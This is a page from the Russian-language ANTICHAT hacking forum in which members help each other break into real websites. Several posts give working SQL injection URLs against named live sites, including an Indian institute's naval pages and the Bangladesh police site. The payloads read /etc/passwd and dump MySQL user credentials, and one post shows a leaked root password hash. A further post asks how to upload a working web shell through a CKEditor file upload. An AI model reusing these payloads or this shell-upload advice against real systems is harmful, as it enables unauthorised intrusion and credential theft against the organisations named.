FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 147 из 296

147

Опции темы

Поиск в этой теме

Опции просмотра

05.11.2016, 17:43

qqq1457

Познающий

Регистрация: 13.10.2016

Сообщений: 33

Провел на форуме:
8589

Репутация: 0

Цитата:

Сообщение от DezMond™

↑
http://gwps.org/36.0.html?&action=showDetails&showid=72
Как раскрутить? как слепая тоже не крутиться(
Таблица be_users колонка usename
Немогу данные выковырять

havij видит что то http://prnt.sc/d3e4kj

но увы mysql=4.0.27

в ручную пока не могу составить запрос

05.11.2016, 17:47

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

Цитата:

Сообщение от qqq1457

↑
1
http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission'+and+false+Un ioN+SeLect+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12--+
или
http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission'+and+false+Un ioN+SeLect+1,load_file(0x2F6574632F706173737764),3 ,4,5,6,7,8,9,10,11,12--+
где 0x2F6574632F706173737764= hex(/etc/passwd)
2
нет доступа к mysql.user то есть нет возможности прочитать файл,несмотря на то что пользователь root, root'ом не является

http://www.naval.iitkgp.ernet.in/me...rd),3,4,5,6,7,8,9,10,11,12+from+mysql.user--+

root:*29EAFC3EEB29D66A3630CAA03C557B3083B2975B

всё там нормально

05.11.2016, 17:50

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

Цитата:

Сообщение от qqq1457

↑
havij видит что то
http://prnt.sc/d3e4kj
но увы mysql=4.0.27
в ручную пока не могу составить запрос

Это я видел. Должен быть вывод....

05.11.2016, 17:59

qqq1457

Познающий

Регистрация: 13.10.2016

Сообщений: 33

Провел на форуме:
8589

Репутация: 0

Цитата:

Сообщение от DezMond™

↑
http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission'+and+false+Un ioN+SeLect+1,concat_ws(0x3a,user,password),3,4,5,6 ,7,8,9,10,11,12+from+mysql.user--+
root:*29EAFC3EEB29D66A3630CAA03C557B3083B2975B
всё там нормально

я про 2 вариант

http://www.police.gov.bd/Police-act...user(),4,5,6,7,8,9,10,11,12,13,14,15,16++--+-

05.11.2016, 18:38

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

Спасибо кто откликнулся.

В первом сайте интересен запрос table_name from information_schema.tables where table_name=database()/

в втором сайте интересней чтение файла. Сори а то что сразу не смог задать нормально вопрос.

08.11.2016, 07:19

IMMORTAL_S

Новичок

Регистрация: 29.04.2010

Сообщений: 19

Провел на форуме:
58603

Репутация: 3

Всем привет!

На странице есть ckeditor с возможностью загружать файлы на сервер.

- заливать можно всё

- имена файлов переименовывается, так что залить .htaccess не получится

- имена после заливки известны

- php, php3, phtml (возможно и другие, больше не пробовал, боюсь мою кучу говна скоро обнаружат) не выполняются, скачиваются

- shtml открывается, но так же не выполняется (судя по всему там хрен что выполняется)

Свои идеи иссякли, а останавливаться на достигнутом не хочется, так что прошу поделиться идеями, размышлениями на тему заливки рабочего шелла и т.п. вещей.

Не уверен что с html+js можно что-то придумать, может какой perl сгодится или еще что, но в этом я уже не силен.

Да кстати, хоть ckeditor версии 4.0.1, толку от этого нет, т.к. папка samples отсутствует.

И еще проверил pl, чтоб наверняка, тоже понятное дело скачивается.